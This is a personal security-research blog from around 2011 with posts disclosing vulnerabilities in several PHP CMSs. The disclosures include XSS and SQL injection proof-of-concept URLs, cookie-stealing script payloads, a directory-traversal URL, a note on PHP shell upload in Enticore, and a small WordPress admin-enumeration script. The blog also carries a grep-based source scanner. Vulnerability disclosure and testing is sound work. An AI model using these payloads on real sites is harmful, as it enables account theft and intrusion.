Working with DynPG Team

Once uppon a time I decide to run new version of my "simple python scanner" (old one is described few posts below).

This time I want to check how could it work with new version of DynPG 4.5.0 CMS.
Few tests started in 17.11.2011 are finished now so me and  Christoph Wuersch 
decide to inform You about new release comming up! ;)


In this place I would like to thank and recommend Christoph (he is independent software developer and he's involved in the programming of the opensource CMS DynPG).

Great work, fast reactions, amazing people.

Good luck! ;)

*Updated*

I just saw that: http://www.dynpg.org :)
Many thanks DynPG! 

Hello World ;)

I see fast growing interest for my blog.
Guests are from all over the world, so:
Hello and thanks You are here ;)

Fuzzing time

Its 3:44 AM ...


I connect my tool to src audit (next version of script described few posts ago) and one of proxy program.
Results: 23 vulnerabilities found: 6 SQL Injections and XSS (few stored) and...
I will post it here as soon as Vendors answers me. And...

Its 3:46 AM... ;)

SQLi/Info Disclo in Concrete 5.4.11

Another old bug...

# --------------------------------------------------------------------------- #
# - Title      : SQL Injection/Info Disclosure in Concrete 5.4.11
# - Tested on      : Ubuntu
# - Date      : 3o.o3.2o11
# - Download Link : sourceforge.net
# - Author      : ;)
# - Greetz      :
# --------------------------------------------------------------------------- #

1. Log in to CMS.
2. Go to:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?&ccm_order_by=fDateAdded&ccm_order_dir='rap&searchInstance=file1301504000
3. Thats it!

* path disclo is also here:
http://localhost/concrete5.4.1.1/index.php/tools/required/files/search_results?searchInstance=file1301504000&submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=aaa&numResults=%22&searchField=&selectedSearchField[]=&ccm-search-files=Search
# regards,
# .

GetSimple CMS 2.03.1 XSS

Some old info that I found on my other disk. Enjoy:

# --------------------------------------------------------------------------- #
# - Title      : GetSimple CMS 2.03.1
# - Tested on      : Ubuntu
# - Date      : 24/27.o3.2o11
# - Download Link : @sourceforge.net
# - Author      : ;)
# - Greetz      :
# --------------------------------------------------------------------------- #


czw, 24 mar 2011, 22:05:57 CET
Get Simple CMS 2.03.1

http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/edit.php
'Create New Page'
post in title "><script> and view


27.o3.2o11 GetSimple 2.03.1 XSS for logged (http://www.cagintranetworks.com/)

http://localhost/www/cms/GetSimple_2.03.1.zip-unzip/GetSimple/admin/theme.php
vulnerable param:
$template="><script>alert(2)</script>


regards,

Simple "scanner" from PentestMag

I decide to publish this simple source code scanner.
I sent it to article in Pentest Magazine first, but now I'm working on better version, so maybe this one will help somebody :)


Idea is simple: do some 'grep' tricks, and write it as an output.html :)

# ---------------------------------------------------
# knewme.py @ 2o11 - v3
# ---------------------------------------------------
# This is a sample 'dirty hack' for php src audit.
#
# dated :
#  xx.o9.2o11 + ...?
#  28.o9.2o11 + php files 'founded'
#  27.o9.2o11 + output.html
#       + project started
#----------------------------------------------------
# run: python knewme.py /dir/with/files/in/php/
# hf o/
#

import sys        # arg
import glob        # list files end elemIT
import getopt        # opts implementation
# --------------------------------------------------
# argvs
try:
  opts, args = getopt.getopt(sys.argv[1:], "hdf:v", ["help","dir=","file="])
except getopt.GetoptError, err:
  print str(err)
  print "Ups... ;C Try with -h;)"
  sys.exit(2)

verbose = False
for o, a in opts:
  if o == "-v":
    verbose = True
  elif o in ("-h","--help"):
    print ""
    print "\t-----------------------------"
    print "\t[<>] knewme.py @ 2o11.v3 [<>]"
    print "\t-----------------------------"
    print "try this way:"
    print "\t-d /dir/where/you/wanna/find/phps"
    print "\t-f /dir/where/is/your/file.php"
    print "\t-h thats me!"
    print "\n[~] try again ;)"
   
  elif o in ("-d","--dir"):
    path = sys.argv[2] +"*.php"    # updated by glob() 28.o9 to find .phps
    logfile = open('dir_check.log','w')
    for stri in glob.glob(path):
      log = logfile.write(stri)  # ---| these 2 lines log to file $logfile
      log = logfile.write("\n")  # ---|
    logfile.close()
    print ("[+] List of php files founded at "+path+" are noted in [dir_check.log]")
    print "[i] You should test it manualy now."
    sys.exit()
  elif o in ("-f","--file"):
    path = sys.argv[2]       # = argv[1]
    filek = open(path, 'r')      #   read mode
    stri = filek.readlines()    #
    filek.close()        # close the file (its already 'readed'

    print " <html><head><title> KnewMe Project @ 2011 - This is Your Rerport</title></head>"
    print " <body><br>"
    print " <center><b><h1> KnewMe Project @ 2011 <br></b><center></h1>"
    print "<b><p align=\"left\"><br>[+] Now checking file: ", filek.name
    print "</b>"
   
    vulnlist = open('vuln.php_list','r')
    for vulnline in vulnlist:
      print ("<b><p align=\"left\">[+] Possible vulnerable function name is : <font color=\"red\"> "+vulnline+" </font> </p></b>")

      i=1
      v = vulnline.strip()
      for line in stri:                        # for $line.find(?) in str=filedsk
        if line.find(v) != -1:
              print ""
              print " <table border=\"1\">"
              print "         <tr bgcolor=\"teal\">"
              print "                 <th>line</td><td>check this</th>"
              print "         </tr><tr bgcolor=\"white\">"
              print ("                <td> %d </td><td> %s </td>") % (i,line)
              print "<br>"
              print "         </tr>"
              print " </table>"
              print "</body></html>"
        i+=1
      # ----------------------------------------------------------- end of for...
 
      print "<b>---------------[ END of this test HERE ] ---------------</br>"
  # --------------------------------------------------------------------end of for...

#      print ""
#      print "[+] vulnerable function list : vuln.php_list"
#     print ""
  # -- end of last elif
  else:
    assert False, "unhandled option"

I will be glad if it helps someone to better understand Python :)

If You have any questions, feel free to ask.

Ananta Gazelle1.0 CMS XSS

This is very nice CMS. But there is a nice XSS too ;)

Go to:

http://Ananta_Gazelle1.0/search.php?lookup=">:)<here:)>alert(1)</here:)>

Updated Resume

Enjoy my updated resume.



Many thanks to Gyn. ;)

What's with Joomla 1.7.2 Stable?

Yesterday I was checking new Joomla CMS and when I login as an admin I found something "not correct" ;)


--- textarea ---
http://localhost/www/joomla/administrator/index.php?option=com_config&view=we have something here:


Joomla!

500 - An error has occurred.

View not found [name, type, prefix]: wehavesomethinghere, html, configView

Return to Control Panel

--- textarea ---

Will be updated... ;)

How can I help You?

I'm looking for some new fresh project :)
- penetration testing of web application
- penetration testing of internal/external networks
- source code audit
- mobile apps RE (malware / code review)

Ask me for more:
hauntit.blog [a+ ]gmail.com or @twitter


o/

Adventure with Pentest Magazine

Few days ago I decide to write something about web application security for Pentest Magazine.
Its just a simple example and my first step in writing articles "for press" but I think next time will be more 'technical' ...

Attached here
Enjoy ;)

Stored XSS in phpMyAdmin 3.4.5-all-languages *update*17.10.2011*

Like I said in one post below, few days ago I wrote my own source code security scanner.
Yesterday it found a new 'possible insecure' parameter in new phpMyAdmin (3.4.5).
Here is a quick note about it:

1. goto http://phpMyAdmin-3.4.5-all-languages/setup/index.php
2. Go to 'New server'
3. vulnerable is (could be) $value, be cause:
when you type 'Save' PMA is going to:
http:///phpMyAdmin-3.4.5-all-languages/setup/validate.php (here is $value param).
Content of thi $param should be:
'';!--"[]script[]alert('try me now! ;)')[/]script[]=&{()}</b>
(... this is 'name of the server')
btw: doing research using Data Tamper I check the vulnerable parameter is $Servers-0-verbose in PMA/setup/index.php.
Anyway I dont saw any of this in PMA/setup/index.php (or either in all *.php files located in PMA directory.
So next I decide to search via grep:
$ grep -e Servers -r ./ | grep verbose (...) ./libraries/config/ConfigFile.class.php: $verbose = $this->get("Servers/$id/verbose"); (...)

so I think vuln is right here ;)

Testing is in progress, so this post will be updated soon...

2.10.2011 * So update here *
It looks like PMA does not validate some "Server-*" parameters.
Vulnerability exist in :
Server-0-verbose <-here will be XSS (upper in this post)
Server-0-host <- here will be vulnerable too

File ./setup/validate.php contains unpropper validation for $value.
Code of XSS placed here is forwarded to ./setup/index.php as a parameters.
And whats next:
<script>alert(123)</script>
to parameters AFTER You click 'Forward' for validate.php try to put the same value (script,etc...) to ./setup/index.php :)

17.10.2011

Update:
www.phpmyadmin.net released the patch for this vuln. Check it out, and try a new version of this amazing webapplication :)

Details here .

*** Important thing *** I really recommend cooperation with PMA Team. People know what they're doing, and doing it fast! Good job! :)

phpMiniAdmin 1.7 vulnerable to SQL Injection and more...

Today I finished 'version 4' of one of my python project: a PHP source code scanner.
I decided to run it against some simple web application.
Found one of course at sourceforge.net : phpMiniAdmin (1.7.110429).

For a few seconds program found few interesting possiblility of vulnerabilities existing in scanned php.
One from the list is possible SQL Injection attack:

--- cut phpminiadmin.php ---
130 function do_sql($q){
--- cut ---

So for a quick-test, type for $q= some'thing, and see whats happen?
http://localhost//phpminiadmin.php?XSS=4F4B12d3aEBa4ba&q=%'hereissql

Other one is unpropper validation of the same parameter ($q), but this time, is XSS:
http://localhost/phpminiadmin.php?XSS=4F4B12d3aEBa4ba&q="><script>alert(document.cookie)</script>
I know this web application isnt something like Fusion CMS or ect... Im just happy, the code is working;)

Enticore CMS (0.8) vs 24.09.2011


Once upon a day I decide to sit back and enjoy a few moments of ‘free time’ spending for vulnerability research in some popular CMS applications.

First I’ve found Enticore CMS 0.8 ( avaliable at http://sourceforge.net/projects/enticore/ ).
I decide to download it and install in my lab-box :)

To make this news more precisely:
„the lab” configuration was: Ubuntu 10.10 with Apache 2.2.16, and PHP 5.3.3. One more important think is that, I set display_errors = On
in php.ini file.

So first what I’ve done was install it on my test lab.
Nothing special in this process but here I found first Cross Site Scripting vulnerability.

1) Cross Site Scripting in ‘install.php’:
Here we go: when we set „include/external/” to 777, we can click to the „next step” of installation process. Our link will be:

http://enticore-0.8/install.php?page=DatabaseBackend

First I tried to make some ../ request for $page parameter, but there was ‘only’ an error:
‘Notice: Undefined index: ../ in ./enticore-0.8/install.php on line 66 Fatal error: Call to
a member function getPage() on a non-object in ./enticore-0.8/install.php on line 67 ‘

Ok, so lets see, what is behind line 66-67:
—cut—
63 function getPage($page) {
64 global $installationSteps;
65
66 $installationStep = $installationSteps[$page]['item'];
67 $retval = $installationStep->getPage();
—cut—

We must definetly choose one of the ‘item’. So I tried to ‘choose’ item, that not exist.
For example: testujto:

—cut—
Notice: Undefined index: testujto in (…) line 66.
—cut—

Ok. Once again, error output informed me, that ‘item’ I decided to use is placed ‘like I wrote it’ in $page parameter.

So next test will be simple
‘><script>alert(‘xss’)</script> :
And here we have our ‘Cross Site Scripting vulnerability’. Checked in source (view source) looks like this:
—cut—
Notice: Undefined index: ‘><script>alert(‘xss’)</script> in ./enticore-0.8/install.php on line 66
—cut—

So vulnerability exist, and there is a possibility to send malformed URL to the victim with JS/HTML payload.

PoC could look like this:

http://enticore-0.8/install.php?page=’><script>alert(doc?ument.cookie)</script> http://enticore-0.8/install.php?page=<h?1>test;)</h?1> <br>
2) XSS in ./include/plugin/EnticorePluginUsers.php
—cut—
241 return Helper::getMessage(‘warn.png’, _(‘Login incorrect, please try again.’)).$this->getLoginForm($_POST['username']);
—cut—

Vulnerability founded here is the same. Enticore not properely validate user input.
So we have another one Cross Site Scripting:
—cut—
POST http://enticore-0.8/index.php?plugin=EnticorePluginUsers&site=login
$username=you <— try to put here some POST values, for example y0
—cut—

Remember, this vulnerable was checked with „display_error = On”! (Some more info about errors in webapps, maybe soon...;))
3) Vulnerabilities for ‘Logged only’.
Now is time for searching some vulnerabilities for logged users. First one has been found for $site parameter.
(Default password for admin is ‘enticore’.)

PoC : (GET send to logged user) http://enticore-0.8/index.php?plugin=EnticorePluginUsers&site=’>test
Vulnerable code:

—cut—
/enticore-0.8$ cat -n ./include/plugin/EnticorePluginUsers.php | grep site
32 * @see include/plugin/EnticorePlugin#getMenuEntries($site)
34 public function getMenuEntries($site) {
38 array_push($retval, array(‘uri’ => $this->generatePluginPart(‘admin’),
‘site’ => ‘admin’, ‘name’ => _(‘Administrate users’), ‘css’ => $this->getSelectedCss(‘admin’)));
40 array_push($retval, array(‘uri’ => $this->generatePluginPart(‘logout’),
‘site’ => ‘logout’, ‘name’ => _(‘Logout’), ‘css’ => $this->getSelectedCss(null, $site != ‘admin’)));
43 array_push($retval, array(‘uri’ => $this->generatePluginPart(‘login’),
‘site’ => ‘login’, ‘name’ => _(‘Login’), ‘css’ => $this->getSelectedCss(null, $site != ‘admin’)));
49 public function getContent($site) {
50 if ($site == ‘login’) {
52 } else if ($site == ‘logout’) {
54 } else if ($site == ‘admin’ || $site == ‘show’) {
56 } else if ($site == ‘add’) {
58 } else if ($site == ‘edit’) {
60 } else if ($site == ‘delete’) {
63 return get_class($this).’: Unkown site ‘.$site;
—cut—

I uderstand this vuln as: get_class is no properly validated, so the PoC can be placed in line 63 of EnticorePluginUsers.php.
Payload for test could be: ‘>testtest2 or whatever you want in HTML/JavaScript.

You should already knew, if there will be something like:
—cut—
(…) switch { if 1 then… if 2, then…, else if anyDifferentSiteValue, and here else Default } (…)
—cut—
the vulnerability should not exist. So think about it how You write your if/else part of code;)


4) DB password stored in clear-text.
—cut—
mysql> use enticore;
Database changed

mysql> select * from ec_users limit 1;
+—–+———-+———-+————+———————-+————————+——–+
| idx | username | password | encryption | email | name | status |
+—–+———-+———-+————+———————-+————————+——–+
| 1 | admin | enticore | plain | admin@yourdomain.com | Enticore Administrator | 1 |
+—–+———-+———-+————+———————-+————————+——–+
1 row in set (0.00 sec)

mysql>
—cut—

Very, very nice! :)

5) Shell upload is possible.
Enticore CMS has a nice page for uploading files via web browser when You’re logged.
First, what „bad hackers” do is trying to upload some kind of shell in PHP, to better
remote access. When we upload a shell in php (shell.php), Enticore, puts in in $webroot/content/shell.php.
File is accessable via web browser, so for this time is game over.
Good practice here is to think about what kind of files could and should be possible to upload.


6) Directory traversal attack (for logged only):

I looked at the source of this CMS and there is opendir() function. Like I thought, we can do a directory traversal attack :

PoC:

http://enticore-0.8/index.php?plugin=EnticorePluginUpload&site=upload&dir=../../../../../../../../../../../../../home/

Be cause of vulnerability in source code:


— cut include/helper/Helper.php —

$ cat -n include/helper/Helper.php | grep opendir
109 if ($handle = opendir($dir)) {
139 if ($handle = opendir($dir)) {
301 $handle = opendir($path.’/');

— cut include/helper/Helper.php —


7) stored XSS in http://enticore-0.8/index.php?plugin=EnticorePluginConfiguration
Try $title too. It is vulnerable to stored xss attack… ;)
Testing in progres...

WordPress 3.2.1 user enumeration vulnerability

Like we all know, not only banks have an user enumeration vulnerabilities in their webapplications :)
Almost all the time „user enumeration” is possible, be cause of bad informing about ‘wrong credentials’ in login process.
So, lets see how it lookgs in new WordPress (3.2.1).

(In pseudo code):
if user_ok --> echo 'user ok'
else if user_bad --> echo 'username invalid'
...
So thats the simple way to enumerate users (bruteforce as welcome) ;)
Here I wrote a simple tool, to check if there is an admin account:

# -------------------------------------------- # sword.py - wordpress > 3.2.1 user enumeration # -------------------------------------------- # 2o.o9.2o11 - v1 . import urllib # urlencode import urllib2 import sys # url = 'http://hello/wordpress/wp-login.php' url = sys.argv[1] + '/wp-login.php' values = { 'log' : 'admin', 'pwd' : 'just-testing...', 'wp-submit' : 'Log+in', # 'redirect_to' : 'http%3A%2F%2Fhello%2Fwordpress%2Fwp-admin%2F', 'redirect_to' : sys.argv[1] + 'wp-admin/', 'testcookie' : '1' } user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' naglowki = { 'User-Agent' : user_agent} data = urllib.urlencode(values) request = urllib2.Request(url, data,naglowki) response = urllib2.urlopen(request) html = response.read() a = "incorrect" in html print "" print "------- sword.py - 2o.o9.2o11 - v1 -------" print "simple wordpress > 3.2.1 enumeration tool" print "------------------------------------------" print "Is there an admin account? " print a

Like You see, this simple tool can enumerate only ‘admin’. So the idea is simple. Check if there is a name(wordlist?;) ), and if it is – analyse/log the answer.

Regards! 

*Update 12.03.2012*

If You want more information about vulnerabilities in latest WordPress,
try here ;)

searchr.py - inspired by catonman

I have been searching about 'how to automate searching in net' and then I found really interesting thing. I saw http://www.catonmat.net. On this site, author wrote a nice "hack" for implementing a kind of 'google-searchr code' in python. I thought about possibilities which its gave me. And thats how I wrote...

# :
# : s3archer.py @ 13.o6.2o11
# :
# : 20.o6 : dodane ua
# : 15.o6 : dodane spanie na googlu
# : 14.o5 : dodane logowanie + edit
# : 13.o5 : dodane szukanie v1
# :
# :
from xgoogle.search import GoogleSearch, SearchError # szukanie
import sys # argz
import socket # gniazda
from time import sleep # spanie na googlach
from urllib import FancyURLopener # UAaaaaaaa
if len(sys.argv) < 2:
print ‘\n-=[ searcher ]=-\n’
print ‘usage: python searcher.py what2find…\n’
try:
gs = GoogleSearch(sys.argv[1])
gs.results_per_page = 100
results = []
while True:
tmp = gs.get_results()
for res in results:
print res.url.encode(„utf-8″) # wyswietla tylko urla
sleep(9)
if not tmp: # brak wynikow
break
results.extend(tmp)
# wyjatki/bledy
except SearchError, e:
print „Search failed: %s” % e

Its of course just a simple example and was made for fun only. Anyway I wish You luck in python learning and programming.
*todo:
- sths wrong with searching (google drop some request; sleep()?)
- make searching more ‘unix style’ – uniq to implement
- add google hacks (filetype, etc)


Drugi post

Zobaczmy :)